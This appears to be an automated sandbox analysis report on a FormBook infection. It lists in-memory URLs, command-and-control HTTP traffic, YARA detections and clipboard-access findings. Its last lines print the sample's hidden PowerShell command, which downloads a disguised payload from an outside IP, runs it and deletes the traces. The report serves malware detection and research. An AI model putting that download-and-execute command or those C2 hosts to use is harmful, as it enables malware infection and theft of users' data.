Source: powershell.exe, 0000000C.00000003.411833366.00000181CCBB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.412180807.00000181CCC0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdf
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.106.232.48
Source: powershell.exe, 0000000C.00000003.425480626.00000181CCBE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.425363983.00000181CCBB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450695738.00000181CCBE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://20.6.
Source: powershell.exe, 00000001.00000002.408114262.000001FD33570000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.460922771.0000023A9CC81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000003.454758877.0000023A9CC81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.425572680.00000181CCB49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.411765873.00000181CCB42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450505987.00000181CCB4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429086805.000001DF7AF1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.448733396.000001DF7AF1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.448691203.000001DF7AF14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429054912.000001DF7AF14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: powershell.exe, 00000001.00000002.406922081.000001FD2B5D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.447539481.00000181C4A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.395307663.000001FD1B571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.457098102.0000023A84A91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.434525264.00000181B4A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.434802938.000001DF00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.40dgj.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.40dgj.xyz/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.40dgj.xyz/s4ig/www.bikebrewandflights.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.40dgj.xyzReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acesso-livre-mercado.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acesso-livre-mercado.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acesso-livre-mercado.com/s4ig/www.40dgj.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acesso-livre-mercado.comReferer:
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bikebrewandflights.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bikebrewandflights.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bikebrewandflights.com/s4ig/www.hibikaiteki.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bikebrewandflights.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.caui.top
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.caui.top/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.caui.top/s4ig/www.giaohanggiaretetkiemhcm.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.caui.topReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.choicearticleto-readtoday.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.choicearticleto-readtoday.info/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.choicearticleto-readtoday.info/s4ig/www.sushifactoryamphawa.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.choicearticleto-readtoday.infoReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.createurs-de-bijoux.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.createurs-de-bijoux.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.createurs-de-bijoux.com/s4ig/www.fairble.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.createurs-de-bijoux.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.deadsdradqueer.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.deadsdradqueer.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.deadsdradqueer.com/s4ig/www.acesso-livre-mercado.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.deadsdradqueer.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fairble.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fairble.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fairble.com/s4ig/www.shref94.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fairble.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com/s4ig/www.mentication.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.giaohanggiaretetkiemhcm.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hibikaiteki.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hibikaiteki.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hibikaiteki.com/s4ig/www.caui.top
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hibikaiteki.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mentication.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mentication.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mentication.com/s4ig/www.prostitutkitambovasuck.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mentication.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mgav21.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mgav21.xyz/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mgav21.xyz/s4ig/www.createurs-de-bijoux.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mgav21.xyzReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nexusbalance.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nexusbalance.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nexusbalance.com/s4ig/www.choicearticleto-readtoday.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nexusbalance.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.prostitutkitambovasuck.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.prostitutkitambovasuck.info/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.prostitutkitambovasuck.info/s4ig/TL
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.prostitutkitambovasuck.infoReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.shref94.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.shref94.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.shref94.com/s4ig/www.deadsdradqueer.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.shref94.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sushifactoryamphawa.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sushifactoryamphawa.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sushifactoryamphawa.com/s4ig/www.mgav21.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sushifactoryamphawa.comReferer:
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.404888113.000001FD1CABB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.446583426.00000181B5F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.406922081.000001FD2B5D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.447539481.00000181C4A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mgydez.site/s4ig/?0tx=dCXC
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG
Source: explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG

Source: unknown

DNS traffic detected: queries for: www.nexusbalance.com

Source: C:\Windows\explorer.exe

Code function: 6_2_043F3A52 getaddrinfo,setsockopt,recv,

6_2_043F3A52

Source: global traffic	HTTP traffic detected: GET /daveCrpted.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 2.56.57.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic	HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA== HTTP/1.1Host: www.nexusbalance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1Host: www.choicearticleto-readtoday.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA== HTTP/1.1Host: www.sushifactoryamphawa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1Host: www.mgav21.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Contains functionality for read data from the clipboard

Source: C:\Windows\explorer.exe

Code function: 6_2_043ECEB2 OpenClipboard,

6_2_043ECEB2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm .vbs,.wsf
